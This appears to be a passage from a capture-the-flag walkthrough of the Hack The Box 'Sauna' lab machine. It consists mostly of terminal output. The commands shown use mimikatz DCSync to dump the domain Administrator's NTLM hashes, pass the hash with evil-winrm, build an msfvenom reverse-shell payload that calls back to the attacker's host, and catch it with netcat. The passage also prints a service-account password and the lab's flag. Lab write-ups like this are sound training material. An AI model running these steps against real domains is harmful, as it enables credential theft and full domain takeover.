'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/26/2021 9:16:16 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
lm - 0: 365ca60e4aba3e9a71d78a3912caf35c
lm - 1: 7af65ae5e7103761ae828523c7713031
Now we can pass the hash with the username Administrator and NTLM hash 823452073d75b9d1cf70ebdf86c7f98e
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e~
Evil-WinRM shell v3.5
Error: Invalid hash format
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 3:11 PM 3D Objects
d-r--- 1/23/2020 3:11 PM Contacts
d-r--- 7/14/2021 3:35 PM Desktop
d-r--- 1/23/2020 3:11 PM Documents
d-r--- 1/23/2020 3:11 PM Downloads
d-r--- 1/23/2020 3:11 PM Favorites
d-r--- 1/23/2020 3:11 PM Links
d-r--- 1/23/2020 3:11 PM Music
d-r--- 1/23/2020 3:11 PM Pictures
d-r--- 1/23/2020 3:11 PM Saved Games
d-r--- 1/23/2020 3:11 PM Searches
d-r--- 1/23/2020 3:11 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/27/2023 9:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f2d1be3960ce7c6cde8ab677b5713616
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Will try and run mimikatz which was initially failing on evil-wrm. We will run a reversh shell and run from our Kali
Creating a reverse shell using msfvenom then upload to the machine
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/shell.exe
Info: Uploading /home/kali/HTB/Sauna/shell.exe to C:\Users\svc_loanmgr\Documents\shell.exe
Run the reverse shell with listener
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\shell.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
and
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\svc_loanmgr\Documents>
upload and run mimikatz.exe and this works and we get the same hash to pass
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\svc_loanmgr\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\svc_loanmgr\Documents
08/27/2023 12:20 PM <DIR> .
08/27/2023 12:20 PM <DIR> ..
08/27/2023 11:39 AM 2,411,274 Invoke-Mimikatz.ps1
08/27/2023 12:21 PM 927,384 mimikatz.exe
08/27/2023 12:08 PM 73,802 reverse.exe
08/27/2023 12:01 PM 73,802 reverse_shell.exe
08/27/2023 12:18 PM 7,168 shell.exe
5 File(s) 3,493,430 bytes
2 Dir(s) 7,828,529,152 bytes free
C:\Users\svc_loanmgr\Documents>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/26/2021 9:16:16 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e